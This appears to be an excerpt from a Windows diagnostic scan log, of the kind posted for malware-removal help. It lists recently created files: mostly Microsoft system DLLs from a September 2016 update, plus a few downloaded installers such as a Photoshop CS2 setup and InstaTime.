2016-10-02 20:49 - 2016-10-03 12:01 - 00000000 ___RD C:\Users\maikp\OneDrive\Documents\Scanned Documents
2016-10-02 20:49 - 2016-10-02 20:49 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Fax
2016-10-02 18:39 - 2016-10-02 18:40 - 375232764 _____ (Adobe Systems Inc. ) C:\Users\maikp\Downloads\PS_CS2_Gr_NonRet.exe
2016-10-02 18:18 - 2016-10-02 18:18 - 30680056 _____ (InstaTime) C:\Users\maikp\Downloads\InstaTime.9.3.10rhinst (1).exe
2016-10-02 18:12 - 2016-10-02 18:12 - 30680056 _____ (InstaTime) C:\Users\maikp\Downloads\InstaTime.9.3.10rhinst.exe
2016-09-30 06:32 - 2016-09-15 19:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2016-09-30 06:32 - 2016-09-15 19:35 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2016-09-30 06:32 - 2016-09-15 19:34 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-09-30 06:32 - 2016-09-15 19:33 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devenum.dll
2016-09-30 06:32 - 2016-09-15 19:29 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2016-09-30 06:32 - 2016-09-15 19:28 - 07812960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-09-30 06:32 - 2016-09-15 19:27 - 00434528 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2016-09-30 06:32 - 2016-09-15 19:23 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-09-30 06:32 - 2016-09-15 19:22 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-09-30 06:32 - 2016-09-15 19:22 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2016-09-30 06:32 - 2016-09-15 19:21 - 01980776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-09-30 06:32 - 2016-09-15 19:21 - 01000288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-09-30 06:32 - 2016-09-15 19:20 - 00634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2016-09-30 06:32 - 2016-09-15 19:15 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-09-30 06:32 - 2016-09-15 19:14 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-09-30 06:32 - 2016-09-15 19:14 - 00119648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2016-09-30 06:32 - 2016-09-15 19:13 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2016-09-30 06:32 - 2016-09-15 19:12 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-09-30 06:32 - 2016-09-15 19:06 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-09-30 06:32 - 2016-09-15 19:06 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2016-09-30 06:32 - 2016-09-15 19:03 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TempSignedLicenseExchangeTask.dll
2016-09-30 06:32 - 2016-09-15 19:02 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll
2016-09-30 06:32 - 2016-09-15 18:58 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2016-09-30 06:32 - 2016-09-15 18:56 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManagerApi.dll
2016-09-30 06:32 - 2016-09-15 18:55 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
2016-09-30 06:32 - 2016-09-15 18:53 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-09-30 06:32 - 2016-09-15 18:52 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-09-30 06:32 - 2016-09-15 18:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2016-09-30 06:32 - 2016-09-15 18:49 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-09-30 06:32 - 2016-09-15 18:49 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2016-09-30 06:32 - 2016-09-15 18:44 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-09-30 06:32 - 2016-09-15 18:43 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-09-30 06:32 - 2016-09-15 18:42 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-09-30 06:32 - 2016-09-15 18:40 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-09-30 06:32 - 2016-09-15 18:40 - 00327680 _____ C:\WINDOWS\system32\wc_storage.dll
2016-09-30 06:32 - 2016-09-15 18:39 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-09-30 06:32 - 2016-09-15 18:39 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-09-30 06:32 - 2016-09-15 18:38 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2016-09-30 06:32 - 2016-09-15 18:38 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-09-30 06:32 - 2016-09-15 18:38 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-09-30 06:32 - 2016-09-15 18:37 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2016-09-30 06:32 - 2016-09-15 18:37 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2016-09-30 06:32 - 2016-09-15 18:36 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-09-30 06:32 - 2016-09-15 18:36 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2016-09-30 06:32 - 2016-09-15 18:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-09-30 06:32 - 2016-09-15 18:35 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2016-09-30 06:32 - 2016-09-15 18:35 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-09-30 06:32 - 2016-09-15 18:34 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2016-09-30 06:32 - 2016-09-15 18:34 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2016-09-30 06:32 - 2016-09-15 18:32 - 01037312 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2016-09-30 06:32 - 2016-09-15 18:30 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-09-30 06:32 - 2016-09-15 18:27 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-09-30 06:32 - 2016-09-15 18:25 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-09-30 06:32 - 2016-09-15 18:23 - 03405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 01491968 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 01535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll
2016-09-30 06:32 - 2016-09-15 18:19 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2016-09-30 06:32 - 2016-09-15 18:19 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-09-30 06:32 - 2016-09-15 18:16 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2016-09-30 06:31 - 2016-09-30 06:31 - 00646136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-09-30 06:31 - 2016-09-30 06:31 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-09-30 06:31 - 2016-09-24 07:55 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-09-30 06:31 - 2016-09-24 07:46 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-09-30 06:31 - 2016-09-24 07:44 - 02264064 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-09-30 06:31 - 2016-09-15 20:14 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-09-30 06:31 - 2016-09-15 19:37 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll
2016-09-30 06:31 - 2016-09-15 19:35 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-09-30 06:31 - 2016-09-15 19:35 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-09-30 06:31 - 2016-09-15 19:32 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-09-30 06:31 - 2016-09-15 19:30 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-09-30 06:31 - 2016-09-15 19:30 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-09-30 06:31 - 2016-09-15 19:30 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 01377016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2016-09-30 06:31 - 2016-09-15 19:29 - 00512416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2016-09-30 06:31 - 2016-09-15 19:29 - 00218008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 00081760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2016-09-30 06:31 - 2016-09-15 19:29 - 00023392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-09-30 06:31 - 2016-09-15 19:28 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-09-30 06:31 - 2016-09-15 19:28 - 01353768 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-09-30 06:31 - 2016-09-15 19:28 - 01172472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-09-30 06:31 - 2016-09-15 19:28 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-09-30 06:31 - 2016-09-15 19:27 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 00553312 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-09-30 06:31 - 2016-09-15 19:26 - 00090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2016-09-30 06:31 - 2016-09-15 19:24 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-09-30 06:31 - 2016-09-15 19:23 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-09-30 06:31 - 2016-09-15 19:23 - 00170960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2016-09-30 06:31 - 2016-09-15 19:21 - 01218912 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-09-30 06:31 - 2016-09-15 19:20 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-09-30 06:31 - 2016-09-15 19:19 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 03893376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2016-09-30 06:31 - 2016-09-15 19:17 - 20965248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-09-30 06:31 - 2016-09-15 19:17 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-09-30 06:31 - 2016-09-15 19:17 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-09-30 06:31 - 2016-09-15 19:16 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 02190176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01292640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00657760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 00206096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 02446704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 00649568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-09-30 06:31 - 2016-09-15 19:15 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-09-30 06:31 - 2016-09-15 19:15 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-09-30 06:31 - 2016-09-15 19:14 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2016-09-30 06:31 - 2016-09-15 19:14 - 00988512 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2016-09-30 06:31 - 2016-09-15 19:14 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2016-09-30 06:31 - 2016-09-15 19:14 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2016-09-30 06:31 - 2016-09-15 19:13 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-09-30 06:31 - 2016-09-15 19:12 - 08158672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-09-30 06:31 - 2016-09-15 19:11 - 04673296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-09-30 06:31 - 2016-09-15 19:11 - 00773168 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-09-30 06:31 - 2016-09-15 19:10 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-09-30 06:31 - 2016-09-15 19:10 - 00918848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 01046880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-09-30 06:31 - 2016-09-15 19:06 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-09-30 06:31 - 2016-09-15 19:03 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-09-30 06:31 - 2016-09-15 19:03 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2016-09-30 06:31 - 2016-09-15 19:01 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-09-30 06:31 - 2016-09-15 18:59 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovslegacy.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2016-09-30 06:31 - 2016-09-15 18:58 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-09-30 06:31 - 2016-09-15 18:56 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DataExchange.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetworkCollectionAgent.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-09-30 06:31 - 2016-09-15 18:55 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\biwinrt.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 01358336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-09-30 06:31 - 2016-09-15 18:51 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2016-09-30 06:31 - 2016-09-15 18:51 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 07219200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
